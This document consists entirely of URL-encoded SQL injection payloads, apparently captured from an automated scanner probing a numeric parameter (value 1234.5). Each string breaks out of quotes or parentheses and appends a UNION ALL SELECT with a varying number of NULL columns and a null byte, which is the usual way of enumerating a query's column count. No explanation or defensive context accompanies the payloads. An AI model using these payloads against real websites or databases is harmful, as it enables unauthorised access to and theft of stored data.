1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22diti%22%20LIKE%20%22diti 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22yLcG%22%20LIKE%20%22yLcG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22VKmN%22%20LIKE%20%22VKmN 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22rBDr%22%20LIKE%20%22rBDr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22xJjD%22%20LIKE%20%22xJjD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Qzoh%22%20LIKE%20%22Qzoh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22wUnO%22%20LIKE%20%22wUnO 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22yYGs%22%20LIKE%20%22yYGs 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22NENc%22%20LIKE%20%22NENc 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22VUBA%22%20LIKE%20%22VUBA 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22QWMt%22%20LIKE%20%22QWMt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22vQNJ%22%20LIKE%20%22vQNJ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22wAYd%22%20LIKE%20%22wAYd 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22OISC%22%20LIKE%20%22OISC 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ztws%22%20LIKE%20%22ztws 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22aICN%22%20LIKE%20%22aICN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ocMa%22%20LIKE%20%22ocMa 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JkFL%22%20LIKE%20%22JkFL 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22oGpm%22%20LIKE%20%22oGpm 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22TEKI%22%20LIKE%20%22TEKI 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22MGBq%22%20LIKE%20%22MGBq 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22GBVi%22%20LIKE%20%22GBVi 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dsmf%22%20LIKE%20%22dsmf 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22JsgK%22%20LIKE%20%22JsgK 1234.5%29%20WHERE%205527%3D5527%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205129%3D5129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%203339%3D3339%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205594%3D5594%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205032%3D5032%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209350%3D9350%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%202460%3D2460%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205408%3D5408%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209709%3D9709%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%208387%3D8387%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%202312%3D2312%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%205303%3D5303%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 